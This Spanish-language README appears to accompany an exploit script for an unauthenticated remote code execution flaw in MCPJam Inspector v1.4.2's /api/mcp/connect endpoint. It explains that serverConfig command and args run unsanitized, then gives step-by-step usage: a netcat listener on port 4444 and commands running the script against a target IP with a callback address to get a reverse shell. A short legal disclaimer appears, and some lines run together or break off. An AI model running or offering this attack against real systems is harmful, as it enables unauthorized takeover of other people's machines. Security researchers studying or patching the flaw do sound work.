
Esta utilidad se creó durante una investigación relacionada con MCPJam v1.4.2. La aplicación expone un endpoint de API que acepta un objeto de configuración de servidor. Bajo ciertas condiciones, una validación insuficiente puede permitir la ejecución no deseada de comandos.
MCPJam Inspector contiene una vulnerabilidad de Ejecución Remota de Código (RCE) no autenticada en el endpoint /api/mcp/connect. La vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios enviando una carga útil maliciosa de configuración del servidor MCP.
El endpoint acepta una carga útil JSON con un objeto serverConfig que contiene un command y un array de args, los cuales se ejecutan directamente en el sistema sin una validación o saneamiento adecuados.
requests: pip install requestsnetcat o socat como listenerTerminal 1 - Iniciar listener:
nc -lvnp 4444
Terminal 2 - Ejecutar el exploit:
python3 script.py <IP_OBJETIVO> -l <TU_IP> --lport 4444
# Por defecto (puerto 6274, puerto de callback 4444)
python3 script.py <IP_OBJETIVO> -l <TU_IP>
# Puerto MCPJam personalizado
python3 script.py <IP_OBJETIVO> -p 6274 -l <TU_IP>
# Puerto de listener personalizado
python3 script.py <IP_OBJETIVO> -l <TU_IP> --lport 5555
/api/mcp/connect⚠️ AVISO LEGAL:
Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Los usuarios son los únicos responsables de:
El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta. Úselo bajo su propio riesgo.
/api/mcp/connect